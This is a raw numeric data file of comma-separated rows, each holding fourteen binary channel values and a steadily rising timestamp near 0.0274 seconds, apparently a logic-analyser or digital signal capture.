1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312612e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312636e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312660e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312684e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312708e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312732e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312760e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312784e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312812e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312836e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312860e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312884e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312908e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312932e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312960e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312984e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7313012e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7313036e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7313060e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7313084e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7313112e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7313140e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7313164e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7313188e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,2.7436860e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.7437084e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.7437088e-02 0,0,0,0,0,0,0,0,0,0,0,1,0,1,2.7437120e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.7437152e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,2.7437432e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.7437468e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,2.7437492e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.7437512e-02 0,0,0,0,0,0,1,0,0,0,0,0,0,1,2.7437516e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,2.7437520e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,1,2.7437536e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,2.7437560e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,1,2.7437564e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.7437568e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,2.7437584e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,2.7437612e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,1,2.7437636e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,2.7437660e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.7437668e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,2.7437684e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7437692e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7437708e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7437732e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7437760e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7437784e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7437812e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7437836e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7437860e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7437884e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7437908e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7437932e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7437960e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7437964e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7437984e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7438012e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7438036e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7438060e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7438068e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7438084e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7438108e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7438116e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7438132e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7438160e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7438164e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7438184e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7438212e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7438236e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7438260e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7438284e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7438308e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7438332e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7438360e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7438364e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7438384e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7438412e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7438416e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7438436e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7438460e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7438484e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7438508e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7438516e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7438532e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7438560e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7438584e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7438612e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7438636e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7438660e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7438668e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7438684e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7438708e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7438716e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7438732e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7438760e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7438764e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7438784e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7438812e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7438836e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7438860e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7438864e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7438884e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7438908e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7438932e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7438960e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7438984e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7439012e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7439036e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7439060e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7439068e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7439084e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7439108e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7439132e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7439160e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7439184e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7439212e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7439236e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7439260e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7439268e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7439284e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7439308e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7439332e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7439360e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7439384e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7439412e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7439436e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7439460e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7439484e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7439508e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7439516e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7439532e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7439560e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7439564e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7439584e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7439612e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7439636e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7439660e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7439684e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7439708e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7439732e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7439760e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7439764e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7439784e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7439812e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7439836e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7439860e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7439884e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7439908e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7439932e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7439960e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7439984e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440012e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440036e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440060e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7440064e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7440084e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7440108e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440116e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440132e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440160e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440184e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440212e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440236e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440260e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7440264e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.7440284e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.7440308e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440316e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440332e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440360e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440384e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440412e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440436e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440460e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440484e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440508e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440532e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440560e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440584e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440612e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440636e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440660e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440684e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440708e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440732e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440760e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440784e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440812e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440836e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440860e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440884e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440908e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440932e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7440960e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7440984e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441012e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441036e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441060e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441084e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441108e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441132e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441160e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441184e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441212e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441236e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441260e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441284e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441308e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441332e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441360e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441384e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441412e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441436e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441460e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441484e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441508e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441532e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441560e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441584e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441612e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441636e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441660e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441684e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441708e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441732e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441760e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441784e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441812e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441836e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441860e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441884e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441908e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441932e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7441960e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7441984e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442012e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442036e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442060e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442084e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442108e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442132e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442160e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442184e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442212e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442236e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442260e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442284e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442308e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442332e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442360e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442384e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442412e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442436e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442460e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442484e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442508e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442532e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442560e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442584e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442612e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442636e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442660e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442684e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442708e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442732e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442760e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442784e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442812e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442836e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442860e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442884e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442908e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442932e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7442960e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7442984e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443012e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7443036e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443060e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7443084e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443108e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7443132e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443160e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7443184e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443212e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7443236e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443260e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7443284e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443308e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7443332e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443360e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7443384e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443412e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7443436e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443460e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7443484e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443508e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7443532e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443560e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7443584e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443612e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7443636e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443660e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7443684e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443708e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7443732e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443760e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7443784e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7443812e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.7568764e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.7568996e-02 1,0,0,0,0,0,0,0,0,0,0,1,0,1,2.7569012e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.7569044e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,2.7569356e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.7569380e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,2.7569428e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.7569456e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,2.7569508e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.7569532e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,2.7569580e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7569596e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7569604e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7569656e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7569680e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7569732e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7569756e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7569780e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7569804e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7569856e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7569880e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7569932e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7569956e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7570004e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7570028e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7570080e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7570108e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7570156e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7570180e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7570228e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7570256e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7570280e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7570300e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7570328e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7570352e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7570404e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7570428e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7570476e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7570500e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7570556e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7570580e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7570628e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7570652e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7570676e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7570700e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7570728e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7570752e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7570804e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7570828e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7570876e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7570900e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7570956e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7570980e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7571028e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7571052e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7571104e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7571128e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7571180e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7571204e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7571228e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7571252e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7571276e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7571300e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7571328e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7571352e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7571380e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7571404e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7571428e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7571452e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7571476e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7571500e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7571528e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7571552e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7571580e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7571604e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7571652e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7571676e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7571728e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7571752e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7571804e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7571828e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7571876e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7571900e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7571956e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7571980e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572004e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572028e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572052e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572076e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572100e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572128e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572152e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572180e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572204e-02 